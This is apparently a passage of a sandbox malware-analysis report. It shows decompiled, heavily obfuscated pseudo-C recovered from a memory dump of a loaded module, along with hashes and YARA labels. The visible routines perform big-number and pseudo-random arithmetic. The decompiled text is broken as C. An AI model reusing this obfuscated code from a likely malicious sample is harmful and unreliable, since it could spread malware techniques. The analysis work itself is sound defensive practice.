									_t551 = _v28;
									_t460 = 0;
									__eflags = 0;
									_v56 = 0;
								} else {
									E6E87E610(_v64, _t481);
									_t551 = _v28;
									E6E87E320(_t551, _v64);
									_t606 = _t606 + 0x10;
								}
								L25:
								_t492 =  *_t551;
								__eflags = _t492 - _v20;
								if(_t492 != _v20) {
									_t576 = _v28;
									_t418 = _t492 + 1;
									 *_t576 = _t418;
									__eflags = _t492 - _t576[1];
									if(_t492 >= _t576[1]) {
										_t576[1] = _t418;
										__eflags = _t418 << 2;
										_t421 = E6E863F90(_t576[2], _t418 << 2);
										_t606 = _t606 + 8;
										_t576[2] = _t421;
									}
									 *((intOrPtr*)(_t576[2] + _v24 * 4)) = 0;
								}
								_v60 = _t460;
								_t461 = _v28;
								__eflags = _v32;
								if(__eflags <= 0) {
									L53:
									_t317 = _a4;
									_t533 = _t317;
									_t495 =  *_a12 -  *_a16;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t317 + 8)) + _t495 * 4)) - 1;
									asm("sbb ecx, 0xffffffff");
									 *_t533 = _t495;
									_t586 =  *_t461;
									__eflags = _t586;
									if(_t586 <= 0) {
										__eflags = 0;
										L58:
										_t319 = _v28;
										 *_t319 = 0;
										_t463 = _t319;
										E6E867D70(_t319, _a8);
										_t584 = _v52;
										_t549 = _v64;
										L6:
										_push(_t549);
										E6E87EBC0();
										_push(_v68);
										E6E87EBC0();
										_push(_v40);
										E6E87EBC0();
										_push(_t463);
										E6E87EBC0();
										_push(_t584);
										E6E87EBC0();
										_push(_v80);
										return E6E87EBC0();
									}
									_t464 = 0;
									_v24 = _t461[2];
									_t328 = 0;
									__eflags = 0;
									do {
										_t552 = _v24;
										_v32 =  *(_t552 + _t586 * 4 - 4);
										_t329 = E6E873860( *(_t552 + _t586 * 4 - 4), _t328, _v60, _v56);
										__eflags = _t329;
										 *(_t552 + _t586 * 4 - 4) = _t329;
										_t535 =  !=  ? _t586 : _t464;
										__eflags = _t464;
										_t464 =  ==  ?  !=  ? _t586 : _t464 : _t464;
										_t498 = _t533 * _v60;
										_t533 = (_t329 * _v60 >> 0x20) + _t329 * _v56;
										_t331 = E6E861A50(0, 0, _t329 * _v60, _t498 + _t533);
										_t606 = _t606 + 0x10;
										_t328 = _t331 + _v32;
										_t586 = _t586 - 1;
										__eflags = _t586;
									} while (_t586 > 0);
									goto L58;
								} else {
									_t465 = _v44;
									_v112 = E6E861460(__eflags, _t465, 0xffffffff);
									_v96 = _t465 + 1;
									_v92 = 4 + _t465 * 4;
									_t336 = E6E861460(__eflags, _v24, 0xa8f61def);
									_v20 = _v24 + 1;
									_t338 = E6E8622E0(__eflags, _v24 + 0x9ecacfc6, _t465);
									_v104 = E6E869D50(0x5413097) + _t338;
									E6E8622E0(__eflags, _v20, _t465);
									_t344 = E6E8622E0(__eflags, E6E861460(__eflags, _t465, 0xbfefafd5) + 1, 0xbfefafd5);
									E6E861460(__eflags, _t465, 1);
									_t621 = _t606 + 0x3c;
									_t466 = _v28;
									_v100 = _t465 + 0x18a13f73;
									_t347 = 0;
									_v88 = _t344 + 0x3baa12e3;
									_v108 = _t336 - _t465 + 0x5709e211;
									_t590 = _v32;
									do {
										_v120 = _t347;
										_v116 = _v108 - _t347;
										E6E861460(__eflags, _t590, 0xffffffff);
										_v84 = _t590;
										_v36 =  *((intOrPtr*)(_t466 + 8));
										_v76 = E6E8622E0(__eflags, _v100 + _t590, 0x18a13f74);
										_v32 = _t590 - 1;
										E6E861460(__eflags, _t590 - 1, _v44);
										_t355 = E6E8613C0(E6E8622E0(__eflags, 0, 0xffffffff), 0,  *((intOrPtr*)(_v36 + _t352 * 4)),  *((intOrPtr*)(_v36 + (_t352 - _t354) * 4)), 0);
										_t502 = _v52[2];
										_t592 =  *(_t502 + _v112 * 4);
										_v72 = _t502;
										_t358 = E6E873860(_t355, _t532, _t592, 0);
										__eflags = _t358 - 0xffffffff;
										_t503 = _t532;
										_v124 = _t592;
										asm("sbb edx, 0x0");
										_t538 =  <  ? _t503 : 0;
										_v20 =  <  ? _t503 : 0;
										_t540 =  <  ? _t358 : 0xffffffff;
										_v24 =  <  ? _t358 : 0xffffffff;
										_t542 = (_t358 * _t592 >> 0x20) + _t503 * _t592;
										asm("adc ebx, 0x2892411f");
										_t360 = E6E861A50(_t355 + 0xd2627799, _t532, _t358 * _t592, _t542);
										_t471 = _t360 - E6E862070(0xb6167735, 0xa7951915);
										asm("sbb esi, edx");
										_v48 = _t542;
										_v72 =  *((intOrPtr*)(_v72 + _v44 * 4 - 8));
										__eflags = _v76 + 0x6e556da6;
										_t366 = E6E861460(_v76 + 0x6e556da6, _v76 + 0x6e556da6, 0xfffffffe);
										_t506 = _v20;
										_t629 = _t621 + 0x50;
										_t543 = _v36;
										_v128 =  *((intOrPtr*)(_t543 + 0x46aa4968 + _t366 * 4));
										_t368 = _v24;
										while(1) {
											_v20 = _t506;
											_v24 = _t368;
											_t369 = E6E863A30(_t368, _t506, _v72, 0);
											_v36 = _t543;
											_t507 = E6E862070(0x6474008c, 0x8f07580a);
											_v76 = _t471;
											_t472 = _t471 << _t507;
											__eflags = _t507 & 0x00000020;
											_t566 =  !=  ? _t472 : (_v48 << 0x00000020 | _t471) << _t507;
											_t473 =  !=  ? 0 : _t472;
											_t474 = ( !=  ? 0 : _t472) | _v128;
											_t376 = E6E862070(0x6474008c, 0x8f07580a);
											_t632 = _t629 + 0x20;
											__eflags = (( !=  ? 0 : _t472) | _v128) - _t369;
											asm("sbb edi, [ebp-0x20]");
											if((( !=  ? 0 : _t472) | _v128) >= _t369) {
												break;
											}
											_t415 = E6E862070(0x393c8f08, 0xec16389c);
											_t569 = _t543;
											asm("adc edi, ecx");
											_t595 = _t415 + _v24 + 0xa2b7705b;
											asm("adc edi, 0x9cee9f69");
											E6E861750(__eflags, _v24, _v20, 0xffffffff, 0xffffffff);
											_t629 = _t632 + 0x18;
											_t368 = _t595;
											_t506 = _t569;
											_t471 = _v76 + _v124;
											__eflags = _t471;
											asm("adc dword [ebp-0x2c], 0x0");
											if(_t471 == 0) {
												continue;
											}
											L37:
											_t509 = _v80;
											_t475 = _v40;
											__eflags = _t569 - 1;
											asm("sbb edx, 0x0");
											_t377 =  *(_t509 + 8);
											 *_t377 = _t595;
											_t377[1] = _t569;
											 *_t509 = 2;
											E6E87E690(_t569 - 1, _v68, _v52, _t509);
											_t633 = _t632 + 0xc;
											_t379 = _v44;
											__eflags = _t379 -  *((intOrPtr*)(_t475 + 4));
											if(_t379 >=  *((intOrPtr*)(_t475 + 4))) {
												 *((intOrPtr*)(_t475 + 4)) = _v96;
												_t414 = E6E863F90( *((intOrPtr*)(_t475 + 8)), _v92);
												_t633 = _t633 + 8;
												 *((intOrPtr*)(_t475 + 8)) = _t414;
												_t379 = _v44;
											}
											__eflags = _t379;
											 *_t475 = 0;
											if(__eflags < 0) {
												L44:
												_t476 = _v40;
												_t380 = E6E87E3C0(_t509, __eflags, _t476, _v68);
												_t634 = _t633 + 8;
												__eflags = _t380;
												if(_t380 != 0) {
													E6E87E380(_t476, _v52);
													_t401 = E6E869D50(0x11f2bfb2);
													_t634 = _t634 + 0xc;
													_t595 = _t595 + _t401 - 0x7586bf1f;
												}
												E6E87E650(_t476, _v68);
												_t635 = _t634 + 8;
												_t570 =  *_t476;
												__eflags = _t570;
												if(_t570 > 0) {
													_t478 = 0;
													__eflags = 1;
													_v36 = 1 - _v84;
													_v20 = _v40[2];
													_v48 = _v28[2];
													0;
													0;
													do {
														_v24 =  *((intOrPtr*)(_v20 + _t478 * 4));
														_t396 = E6E8622E0(__eflags, 0, _t478);
														E6E861460(__eflags, _t478, _v32);
														_t635 = _t635 + 0x10;
														_t478 = _t478 + 1;
														 *((intOrPtr*)(_v48 - (_t396 + _v36 << 2))) = _v24;
														_t570 =  *_v40;
														__eflags = _t478 - _t570;
													} while (__eflags < 0);
												}
												goto L49;
											} else {
												_t479 = 0;
												_v24 = _v28[2];
												_v20 = _v40[2];
												do {
													_t509 = _v24;
													_t408 =  *(_v24 + (_v32 + _t479) * 4);
													__eflags = _t408;
													 *(_v20 + _t479 * 4) = _t408;
													if(__eflags != 0) {
														_t412 = E6E8622E0(__eflags, 0, _t479);
														_t633 = _t633 + 8;
														_t509 = 1 - _t412;
														 *_v40 = 1 - _t412;
													}
													_t409 = E6E8622E0(__eflags, _t479, 0x19c77e59);
													_t410 = E6E869D50(0x7db37ef5);
													E6E861460(__eflags, _t479, 1);
													_t633 = _t633 + 0x14;
													__eflags = _t479 - _v44;
													_t479 = _t409 + _t410 + 1;
												} while (__eflags != 0);
												goto L44;
											}
										}
										_t595 = _v24;
										__eflags = _t376 & 0x00000020;
										_t569 =  ==  ? (_v20 << 0x00000020 | _t595) >> _t376 : _v20 >> _t376;
										goto L37;
										L49:
										__eflags = _t570 - _v44;
										if(_t570 <= _v44) {
											_t387 = E6E861460(__eflags, _t570 - E6E869D50(0x1f4aa581), _v116);
											__eflags = _v88 - _t570;
											E6E873580(_v28[2] + _t387 * 4 - 0x13056b4c, 0, 0x1157b474 + (_v88 - _t570) * 4);
											_t635 = _t635 + 0x18;
										}
										_t510 = _a4;
										_t532 = _v84;
										__eflags = _t595;
										_t461 = _v28;
										 *( *((intOrPtr*)(_t510 + 8)) + _t532 * 4 - 4) = _t595;
										_t590 = _v32;
										if(_t595 != 0) {
											 *_t510 = _t590;
										}
										_t383 = E6E869D50(0xf239476a);
										_t606 = _t635 + 4;
										_t347 = _v120 - _t383 + 0x964d47c7;
										__eflags = _t347 - _v104;
									} while (__eflags != 0);
									goto L53;
								}
							}
						}
						_t484 = _a12;
						_t527 = _a4;
						_t582 =  *_t484;
						__eflags =  *(_t527 + 4) - _t582;
						if( *(_t527 + 4) < _t582) {
							 *(_t527 + 4) = _t582;
							__eflags = _t582 << E6E869D50(0x647400ae);
							_t450 = E6E863F90( *((intOrPtr*)(_a4 + 8)), _t582 << E6E869D50(0x647400ae));
							_t527 = _a4;
							_t602 = _t602 + 0xc;
							 *((intOrPtr*)(_t527 + 8)) = _t450;
							_t582 =  *_t484;
						}
						__eflags = _t582;
						if(_t582 <= 0) {
							__eflags = 0;
							goto L22;
						} else {
							_t486 = 0;
							_t599 = 0;
							__eflags = 0;
							_v48 = _t484[2];
							_v36 =  *((intOrPtr*)(_t527 + 8));
							_v32 =  *((intOrPtr*)(_a16 + 8));
							0;
							0;
							do {
								_v20 = _t486;
								_v24 =  *((intOrPtr*)(_v48 + _t582 * 4 - 4));
								 *((intOrPtr*)(_v36 + _t582 * 4 - 4)) = E6E873860( *((intOrPtr*)(_v48 + _t582 * 4 - 4)), _t599,  *_v32, 0);
								_t444 = E6E865920(_v36, _t443, 0);
								_t602 = _t602 + 8;
								__eflags = _t444 & 0x00000001;
								_t445 = _v20;
								_t487 =  !=  ? _t582 : _t486;
								__eflags = _t445;
								_t486 =  !=  ? _t445 :  !=  ? _t582 : _t486;
								_t599 = E6E872E20(_v24, _t599,  *_v32, 0);
								_t582 = _t582 - 1;
								__eflags = _t582;
							} while (_t582 > 0);
							L22:
							_t549 = _v64;
							E6E87E610(_a8, 0);
							_t584 = _v52;
							 *_a4 = 0;
							L5:
							_t463 = _v28;
							goto L6;
						}
					}
					 *_a4 = 0;
					E6E87E610(_a8, 0);
					L4:
					goto L5;
				}
				 *_a4 = 0;
				E6E867D70(_t455, _a8);
				goto L4;
			}

0x6e87da70
0x6e87da79
0x6e87da81
0x6e87da88
0x6e87da90
0x6e87da97
0x6e87da9f
0x6e87daa7
0x6e87daae
0x6e87dab3
0x6e87dab8
0x6e87dacf
0x6e87dad4
0x6e87dad7
0x6e87dad9
0x6e87db38
0x6e87db3b
0x6e87db3e
0x6e87db40
0x6e87db43
0x6e87dc09
0x6e87dc20
0x6e87dc22
0x6e87dc25
0x6e87dc28
0x6e87dc2e
0x6e87dc36
0x6e87dc3b
0x6e87dc40
0x6e87dc46
0x6e87dc48
0x6e87dc4a
0x6e87dc4d
0x6e87dc4f
0x6e87dc5d
0x6e87dc62
0x6e87dc65
0x6e87dc65
0x6e87dc68
0x6e87dc6f
0x6e87dc7b
0x6e87dc80
0x6e87dc83
0x6e87dc85
0x6e87dc88
0x6e87dc8b
0x6e87dc90
0x6e87dd44
0x6e87dd4b
0x00000000
0x6e87dc96
0x6e87dc96
0x6e87dc96
0x6e87dc98
0x6e87dca0
0x6e87dca6
0x6e87dca9
0x6e87dcb2
0x6e87dcd1
0x6e87dce0
0x6e87dcef
0x6e87dcf2
0x6e87dcf7
0x6e87dcfa
0x6e87dcfd
0x6e87dcfd
0x6e87dd03
0x6e87dd05
0x6e87dd52
0x6e87dd55
0x6e87dd55
0x6e87dd57
0x6e87dd07
0x6e87dd0c
0x6e87dd15
0x6e87dd19
0x6e87dd1e
0x6e87dd1e
0x6e87dd5e
0x6e87dd61
0x6e87dd63
0x6e87dd65
0x6e87dd67
0x6e87dd6a
0x6e87dd6d
0x6e87dd6f
0x6e87dd72
0x6e87dd74
0x6e87dd77
0x6e87dd7e
0x6e87dd83
0x6e87dd86
0x6e87dd86
0x6e87dd8f
0x6e87dd8f
0x6e87dd99
0x6e87dd9c
0x6e87dd9f
0x6e87dda1
0x6e87e285
0x6e87e288
0x6e87e290
0x6e87e295
0x6e87e297
0x6e87e29b
0x6e87e29e
0x6e87e2a0
0x6e87e2a2
0x6e87e2a4
0x6e87e300
0x6e87e302
0x6e87e302
0x6e87e305
0x6e87e307
0x6e87e30d
0x6e87e315
0x6e87e318
0x6e87daf4
0x6e87daf4
0x6e87daf5
0x6e87dafd
0x6e87db00
0x6e87db08
0x6e87db0b
0x6e87db13
0x6e87db14
0x6e87db1c
0x6e87db1d
0x6e87db25
0x6e87db34
0x6e87db34
0x6e87e2a9
0x6e87e2ab
0x6e87e2ae
0x6e87e2ae
0x6e87e2b0
0x6e87e2b0
0x6e87e2b7
0x6e87e2c2
0x6e87e2c9
0x6e87e2cd
0x6e87e2d3
0x6e87e2d6
0x6e87e2d8
0x6e87e2e2
0x6e87e2e6
0x6e87e2f0
0x6e87e2f5
0x6e87e2f8
0x6e87e2fb
0x6e87e2fb
0x6e87e2fb
0x00000000
0x6e87dda7
0x6e87dda9
0x6e87ddb5
0x6e87ddbb
0x6e87ddc5
0x6e87ddd3
0x6e87dde6
0x6e87ddeb
0x6e87de04
0x6e87de0b
0x6e87de28
0x6e87de35
0x6e87de3a
0x6e87de45
0x6e87de54
0x6e87de57
0x6e87de59
0x6e87de5c
0x6e87de5f
0x6e87de92
0x6e87de95
0x6e87de9d
0x6e87dea3
0x6e87deae
0x6e87deb1
0x6e87dec9
0x6e87decf
0x6e87ded3
0x6e87def7
0x6e87df06
0x6e87df0c
0x6e87df0f
0x6e87df17
0x6e87df1c
0x6e87df1f
0x6e87df21
0x6e87df24
0x6e87df2c
0x6e87df2f
0x6e87df37
0x6e87df3d
0x6e87df42
0x6e87df4a
0x6e87df54
0x6e87df72
0x6e87df7a
0x6e87df7c
0x6e87df83
0x6e87df89
0x6e87df91
0x6e87df96
0x6e87df99
0x6e87df9c
0x6e87dfa6
0x6e87dfa9
0x6e87dfb0
0x6e87dfb5
0x6e87dfb9
0x6e87dfbd
0x6e87dfcc
0x6e87dfe1
0x6e87dfe3
0x6e87dfee
0x6e87dff0
0x6e87dff3
0x6e87dff6
0x6e87dffe
0x6e87e008
0x6e87e00d
0x6e87e010
0x6e87e012
0x6e87e015
0x00000000
0x00000000
0x6e87e021
0x6e87e031
0x6e87e035
0x6e87e037
0x6e87e03d
0x6e87e049
0x6e87e04e
0x6e87e054
0x6e87e056
0x6e87e058
0x6e87e058
0x6e87e05b
0x6e87e05f
0x00000000
0x00000000
0x6e87e084
0x6e87e084
0x6e87e087
0x6e87e08a
0x6e87e092
0x6e87e095
0x6e87e098
0x6e87e09a
0x6e87e09d
0x6e87e0a6
0x6e87e0ab
0x6e87e0ae
0x6e87e0b1
0x6e87e0b4
0x6e87e0b9
0x6e87e0c2
0x6e87e0c7
0x6e87e0ca
0x6e87e0cd
0x6e87e0cd
0x6e87e0d0
0x6e87e0d2
0x6e87e0d8
0x6e87e170
0x6e87e173
0x6e87e177
0x6e87e17c
0x6e87e17f
0x6e87e181
0x6e87e187
0x6e87e194
0x6e87e199
0x6e87e19c
0x6e87e19c
0x6e87e1a7
0x6e87e1ac
0x6e87e1af
0x6e87e1b1
0x6e87e1b3
0x6e87e1bd
0x6e87e1bf
0x6e87e1c5
0x6e87e1c8
0x6e87e1d1
0x6e87e1da
0x6e87e1de
0x6e87e1e0
0x6e87e1e6
0x6e87e1ec
0x6e87e1fd
0x6e87e202
0x6e87e20e
0x6e87e211
0x6e87e216
0x6e87e218
0x6e87e218
0x6e87e1e0
0x00000000
0x6e87e0de
0x6e87e0e1
0x6e87e0e6
0x6e87e0ef
0x6e87e133
0x6e87e136
0x6e87e13e
0x6e87e141
0x6e87e143
0x6e87e146
0x6e87e14b
0x6e87e150
0x6e87e15b
0x6e87e15d
0x6e87e15d
0x6e87e106
0x6e87e115
0x6e87e124
0x6e87e129
0x6e87e12c
0x6e87e12f
0x6e87e12f
0x00000000
0x6e87e133
0x6e87e0d8
0x6e87e070
0x6e87e07f
0x6e87e081
0x00000000
0x6e87e21c
0x6e87e21c
0x6e87e21f
0x6e87e23c
0x6e87e24e
0x6e87e25b
0x6e87e260
0x6e87e260
0x6e87e263
0x6e87e266
0x6e87e269
0x6e87e26b
0x6e87e271
0x6e87e275
0x6e87e278
0x6e87e27e
0x6e87e27e
0x6e87de75
0x6e87de7a
0x6e87de84
0x6e87de89
0x6e87de89
0x00000000
0x6e87de92
0x6e87dda1
0x6e87dc90
0x6e87db49
0x6e87db4c
0x6e87db4f
0x6e87db51
0x6e87db54
0x6e87db56
0x6e87db68
0x6e87db71
0x6e87db76
0x6e87db79
0x6e87db7c
0x6e87db7f
0x6e87db7f
0x6e87db81
0x6e87db83
0x6e87dd25
0x00000000
0x6e87db89
0x6e87db8f
0x6e87db91
0x6e87db91
0x6e87db93
0x6e87db99
0x6e87db9f
0x6e87dba8
0x6e87dbac
0x6e87dbb0
0x6e87dbb3
0x6e87dbba
0x6e87dbce
0x6e87dbd5
0x6e87dbda
0x6e87dbdd
0x6e87dbdf
0x6e87dbe2
0x6e87dbe5
0x6e87dbe7
0x6e87dbfa
0x6e87dbfc
0x6e87dbfc
0x6e87dbfc
0x6e87dd27
0x6e87dd27
0x6e87dd2f
0x6e87dd3a
0x6e87dd3d
0x6e87daf1
0x6e87daf1
0x00000000
0x6e87daf1
0x6e87db83
0x6e87dade
0x6e87dae9
0x6e87daee
0x00000000
0x6e87daee
0x6e87dabd
0x6e87dac7
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1816cfe10174928abd16d1a99890d37644a3016eb14df31a3963b89732d4406f
Instruction ID: a672ddb4b9c627e791ad159b3d2dd16377d640bbbb688c8b8cf42b702f427480
Opcode Fuzzy Hash: 1816cfe10174928abd16d1a99890d37644a3016eb14df31a3963b89732d4406f
Instruction Fuzzy Hash: 324274B5D002099FDF10CFE8DC81AEEBBB5AF49318F144929E819A7351E731AD15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E875BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E875BF0(void* __eflags) {
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				void* _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t57;
				void* _t60;
				unsigned int _t64;
				signed int _t69;
				signed int _t71;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t86;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				void* _t103;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t111;
				signed int _t120;
				signed int _t121;
				signed int _t128;
				signed int _t131;
				signed int _t169;
				void* _t179;
				signed int _t183;
				signed int _t188;
				signed int _t194;
				void* _t195;
				void* _t196;
				signed int _t237;

				_t169 =  *0x6e884194; // 0x1
				_t48 = E6E869D50(0x647402c3);
				_t196 = _t195 + 4;
				_t234 = _t169 - _t48;
				if(_t169 > _t48) {
					_t179 = 0xfffffc74;
					0;
					do {
						_v24 = E6E8620A0(_t234,  *(_t179 + 0x6e883b60), 0xffffffff);
						_t69 = E6E869D50(0xe47400ac);
						_t71 = E6E8620A0(_t234, E6E869D50(0x5c38c288), 0xffffffff);
						_t74 = E6E863750(_t234,  !(E6E862DC0(_t234, _v24,  !_t69)), _t71 | 0x384cc224);
						_t196 = _t196 + 0x28;
						 *(_t179 + 0x6e883b60) =  *(0x6e880434 + ( *(_t179 + 0x6e883b64) & 0x00000001) * 4) ^  *(_t179 + 0x6e884194) ^ ( *(_t179 + 0x6e883b64) & 0x7ffffffe | _t74) >> 0x00000001;
						_t179 = _t179 + 4;
						_t235 = _t179;
					} while (_t179 != 0);
					_t75 = 0xe3;
					_t120 = 0xe3;
					0;
					do {
						_v24 = _t75;
						_v20 = 0x6e8837d4[_t75];
						_t77 = E6E869D50(0xe47400ac);
						_t78 = E6E862DC0(_t235, 0xe98fe736, 0x167018c9);
						_t121 = _t120 - E6E869D50(0xdd67dd4);
						_v36 = _t121 + 0x69a27d79;
						_v20 =  *((intOrPtr*)(0x15122db8 + _t121 * 4));
						_t81 = E6E8620A0(_t235, 0x7ffffffe, 0xffffffff);
						E6E863750(_t235, _v20, 0x7ffffffe);
						_v28 =  !(_t78 & _v20 & _t77);
						_t86 = E6E869D50(0x58908707);
						_v28 = E6E862DC0(_t235, E6E8620A0(_t235,  !_t81 & _v20 & 0xc31b7854 | _t86 &  !( !_t81 & _v20), _t78 & _v20 & _t77 & 0xc31b7854 | E6E869D50(0x58908707) & _v28),  !_t81 & _v20 & _t78 & _v20 & _t77);
						E6E862DC0(_t235,  !_t81 & _v20, _t78 & _v20 & _t77);
						E6E869D50(0x9b8bffb1);
						_v28 = _v28 >> 1;
						_t128 =  *(0x6e883448 + _v24 * 4);
						_v32 = _t128;
						_t183 =  *(0x6e880434 + (_v20 & 0x00000001) * 4);
						_v20 = _t183;
						_t97 = E6E8620A0(_t235, 0xc62da7e4, 0xffffffff);
						_t98 = E6E863750(_t235, _v32, _t97);
						_t120 = _v36;
						_t188 = (_t98 |  !_t128 & 0xc62da7e4) ^ (_t97 & _v20 |  !_t183 & 0xc62da7e4);
						E6E8620A0(_t235, _v20, _v32);
						_t100 = _v28;
						E6E8620A0(_t235, _t188, _t100);
						0x6e8837d4[_v24] = _t188 ^ _t100;
						_t103 = E6E869D50(0x647402c3);
						_t196 = _t196 + 0x68;
						_t236 = _t120 - _t103;
						_t75 = _t120;
					} while (_t120 != _t103);
					_t104 = E6E863750(_t236,  *0x6e884190, 0x80000000);
					_t131 =  *0x6e8837d4; // 0x180dd266
					_t105 = E6E869D50(0x1b8bff52);
					_v24 = _t131;
					_t106 = E6E8620A0(_t236, _t131, 0xffffffff);
					_t107 = E6E8620A0(_t236, 1, 0xffffffff);
					_t111 = E6E863750(_t236,  !(_t107 | _t106), (E6E869D50(0x72976c99) | 0x16e36c35) ^ 0xe91c93ca);
					E6E863750(_t236, _v24, 1);
					_t196 = _t196 + 0x30;
					_t194 = (_t105 & _t131 | _t104) >> 0x00000001 ^  *0x6e883e04 ^  *(0x6e880434 + _t111 * 4);
					_t237 = _t194;
					 *0x6e884194 = 0;
					 *0x6e884190 = _t194;
				}
				_t49 =  *0x6e884194; // 0x1
				_t150 = 0x6e8837d4[_t49];
				_t47 = _t49 + 1; // 0x2
				 *0x6e884194 = _t47;
				_t50 = E6E8620A0(_t237, 0x6e8837d4[_t49], 0xffffffff);
				_t51 = E6E869D50(0x209e1c2b);
				E6E8620A0(_t237, _t150 >> 0xb, _t150);
				_t57 = E6E8620A0(_t237, ((_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87) << 0x00000007 & 0x9d2c5680, (_t150 & 0xbb15e378 | _t51 & _t50) ^ _t150 >> 0x0000000b ^ 0x44ea1c87);
				E6E869D50(0x8bb200ac);
				_t60 = E6E863750(_t237, E6E8620A0(_t237, _t57, 0xffffffff), 0x33945623);
				_t64 = E6E862DC0(_t237, _t60, E6E863750(_t237, _t57, 0xcc6ba9dc)) ^ _t57 << 0x0000000f & 0xefc60000 ^ 0x33945623;
				return E6E8620A0(_t237, _t64, 0xffffffff) & _t64 >> 0x00000012 |  !(_t64 >> 0x12) & _t64;
			}

0x6e875bf9
0x6e875c04
0x6e875c09
0x6e875c0c
0x6e875c0e
0x6e875c14
0x6e875c1f
0x6e875c20
0x6e875c30
0x6e875c38
0x6e875c54
0x6e875c74
0x6e875c79
0x6e875ca0
0x6e875ca6
0x6e875ca6
0x6e875ca6
0x6e875caf
0x6e875cb4
0x6e875cbc
0x6e875cc0
0x6e875cc0
0x6e875cca
0x6e875cd2
0x6e875ce6
0x6e875d02
0x6e875d11
0x6e875d14
0x6e875d1e
0x6e875d35
0x6e875d45
0x6e875d4d
0x6e875d93
0x6e875d98
0x6e875da5
0x6e875db0
0x6e875db3
0x6e875dc0
0x6e875dc5
0x6e875dcc
0x6e875dde
0x6e875df7
0x6e875e03
0x6e875e06
0x6e875e0e
0x6e875e16
0x6e875e1f
0x6e875e2a
0x6e875e36
0x6e875e3b
0x6e875e3e
0x6e875e40
0x6e875e40
0x6e875e53
0x6e875e5b
0x6e875e68
0x6e875e72
0x6e875e84
0x6e875e92
0x6e875eb9
0x6e875ec8
0x6e875ecd
0x6e875ed0
0x6e875ed0
0x6e875ed7
0x6e875ee1
0x6e875ee1
0x6e875ee7
0x6e875eec
0x6e875ef3
0x6e875ef6
0x6e875f04
0x6e875f13
0x6e875f31
0x6e875f45
0x6e875f59
0x6e875f72
0x6e875f9c
0x6e875fc2

Memory Dump Source

Source File: 00000004.00000002.2154531469.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000004.00000002.2154525591.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154545428.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2154551264.000000006E882000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2154557143.000000006E885000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9231d3991f360f5b2c58a28647afb6f850e638ebfd25e6df687ffd4a63a2297
Instruction ID: d91e0fd8ccd46fa67d0c8716342da11d6f5f5a387b1e4c243d468f9602dc22d9
Opcode Fuzzy Hash: d9231d3991f360f5b2c58a28647afb6f850e638ebfd25e6df687ffd4a63a2297
Instruction Fuzzy Hash: E3913BF7D105145BEB019BFCEC419AF77A89B5626CB490A30EC18B7382FA255E14C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6E863A30, Relevance: .1, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E863A30(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed char _t68;
				signed int _t69;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed char _t88;
				signed int _t95;
				signed char _t96;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t109;
				signed char _t113;
				signed int _t114;
				signed int _t133;
				signed int _t145;
				signed int _t147;
				signed char _t156;
				signed int _t157;
				signed int _t162;
				signed int _t163;

				_t97 = _a12;
				_t68 = (((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) << 6) + ((_a4 + 0x00000033 | _t97) - _t97 & 0x000000ff) * 2 + 0xd6;
				_t156 = _t68;
				_t69 = _t68 * _t97;
				_t145 = _a8;
				if((_t68 * _t97 >> 0x00000020 | _t68 ^ _t97) != 0) {
					_v32 = _t156;
					_t98 = _a4;
				} else {
					_t98 = _a4;
					_t95 = (_t69 + _t156 & 0x000000ff | _t98) & _a12;
					_t96 = _t95 - _t98;
					_v32 = _t96;
					_t69 = _t95;
					_v28 = _t96 + _t69;
				}
				_v20 = _t69;
				_t157 = _t69;
				_t72 = E6E869C60(_t98, _t145, _t157, _t157 >> 0x1f);
				_v24 = 0;
				if((_t145 ^ _a16 | _t98 ^ _a12) != 0) {
					_t109 = _a12;
				} else {
					_t109 = _a12;
					if((_t72 & 0x00000001) != 0) {
						_t88 = _v20 * _v28;
						_t145 = (_t88 + _t109) * _t157;
						_v24 = (_t88 & 0x000000ff) + _t145;
					}
				}
				_t73 = _t109;
				_t74 = _t73 * _t98;
				_v28 = _t74;
				_t162 = _a16 * _t98 + _t109 * _a8 + (_t73 * _t98 >> 0x20);
				_t113 = _v24 + _t145;
				_v24 = _t113;
				_t100 = _t113 * _t74;
				_t76 = E6E869D50(0x647420ac) & (_t145 ^ _t100);
				_t114 = _t76;
				_t101 = _t100 | _t114;
				_v20 = _t162;
				_t147 = _v28;
				_t163 = _t147;
				if((_t147 ^ _a12 | _t162 ^ _a16) == 0) {
					L10:
					_t101 = _t101 * _t114 + _v24;
					_t79 = _t163 * _v32;
					_t133 = _t79 * _t101 >> 0x20;
					_t76 = (_t79 * _t101 & 0x000000ff) * 0x00000045 | _t101;
					goto L11;
